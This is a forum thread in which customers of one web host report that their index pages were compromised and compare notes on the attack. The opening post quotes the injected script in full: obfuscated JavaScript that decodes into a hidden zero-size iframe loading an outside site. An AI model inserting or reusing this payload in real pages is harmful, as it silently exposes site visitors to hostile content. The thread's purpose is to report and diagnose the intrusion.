Hacker Attack

[wazimm]

Steps to reproduce the problem:

I have noticed many of the index.php, index.html, index.htm, and basically all index pages have been modified. Since it happened to all the index pages, I really don't think it was manually done. I checked the permissions on those pages and they were all set at 644.

at http://directory.isins.com , i noticed a piece of javascript was added at the end of the index page. Here it is:

<<!-- ~ --><script language=javascript>document.write(unesc ape('%3C%73%63%72%69%70%74%20%6C%61%6E%6 7%75%61%67%65%3D%22%6A%61%76%61%73%63%72 %69%70%74%22%3E%66%75%6E%63%74%69%6F%6E% 20%64%46%28%73%29%7B%76%61%72%20%73%31%3 D%75%6E%65%73%63%61%70%65%28%73%2E%73%75 %62%73%74%72%28%30%2C%73%2E%6C%65%6E%67% 74%68%2D%31%29%29%3B%20%76%61%72%20%74%3 D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C %73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B% 29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6 F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E %63%68%61%72%43%6F%64%65%41%74%28%69%29% 2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%6 5%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F %63%75%6D%65%6E%74%2E%77%72%69%74%65%28% 75%6E%65%73%63%61%70%65%28%74%29%29%3B%7 D%3C%2F%73%63%72%69%70%74%3E'));dF('%264 Dtdsjqu%2631mbohvbhf%264Ekbwbtdsjqu%264F %261E%261Bepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E% 2638iuuq%264B00xxx/gsff31/dpn0qpsubm0joefy/qiq%264Gbgg%264Esb%7Bfdd%2638%2631xjeui% 264E%26381%2638%2631ifjhiu%264E%26381%26 38%2631gsbnfcpsefs%264E%26381%2638%264F% 264D0jgsbnf%264F%2633%263%3A%261E%261B%2 64D0tdsjqu%264F1')</script><!-- ~ -->

[Vin DSL]

Have you checked your logs yet?

[rob1_ee]

Bugger- yep, I got hit too. On yoda if it matters. I doubt they came in through one of my scripts. Looks like most of the index pages were hit. I put in a ticket. Looking at logs will have to wait until morning- hopefully support will have it nailed down by then anyway.

[JPC-Masood]

Please make sure your account is secure: http://www.jaguarpc.com/support/kbase/731.html

[rob1_ee]

Thanks for the link- that's pretty much what the ticket reply said as well. However, I didn't have the raw logs saved. I've only got one script running and it is tight and up to date. While it's possible something could have snuck in that way, I seriously doubt it. I did have a current openid script up- though not linked in. Still- didn't see any security reports on it.

The other option I can think of is guessing my ftp info. But without the raw logs- does that mean there's basically no way to track down how they gained access? If I can't track that down for sure, I can't be sure it's fixed.

[Gwaihir]

Can't support get you the raw log? This is a recent event, right?

[zupergeorge]

Steps to reproduce the problem:

I have noticed many of the index.php, index.html, index.htm, and basically all index pages have been modified. Since it happened to all the index pages, I really don't think it was manually done. I checked the permissions on those pages and they were all set at 644.

at http://directory.isins.com , i noticed a piece of javascript was added at the end of the index page. Here it is:

The exact same thing happened to me. It probably started yesterday, or the day before that. My main domain is a simple html file, linking to my two subdomains that both run the latest version of Wordpress. The same javascript was on all the index.(php|html|htm) files, on all three of the domains.

I just re-uploaded everything to make sure it's gone.

[KaiserSoze]

yup, got hacked too.

can someone give some info on this? how it was done and how it can be avoided again?

[KaiserSoze]

Any more news on this? I checked that all my pages were 644, i dont have any premade scripts on my site. I only have a few pages on my site and its off the internet. The only way you can get into the site is by logging in, and the usernames and passwords are pretty secure. I'm on the different server that yoda. Look like more than one server got attacked.

Also, i didnt realise i got hacked until one of the users pointed it out. The javascript didnt work on my browser but it did on others. So other webmasters might want to check their index.htm|html|php pages to see if they got hacked. The code is on the footer of the pages.

[Connie]

What is that javascript supposed to do?

[lloyd_borrett]

I'm constantly getting hacked on a number of my JaguarPC accounts over the last few days. I haven't been able to determine where the whole that is being exploited is. I can't even determine what the common demoninator to these accounts is.

[Frank Broughton]

Lloyd,

Are you in communication with the bigwigs on this?

[padprint]

i have found several of the sites i maintain hacked today. they range from simple html sites to open source commerce sites. they span several servers on jag.

i reported the info to jag, and got the same generic response link.. but with two of the sites being very basic html sites (with 1 php include for the menus), i don't see them being caused by a script..

now i get to check every other site i maintain.

[Ron]

So far everything is ok at my sites.... but I don't like saying this.

[Mighty]

9 sites hacked over the last 3 days, 3 of them 3 times ... I have also gotten the canned link from support as well. I am starting to think perhaps its another hole in cpanel or jag has some serious problems.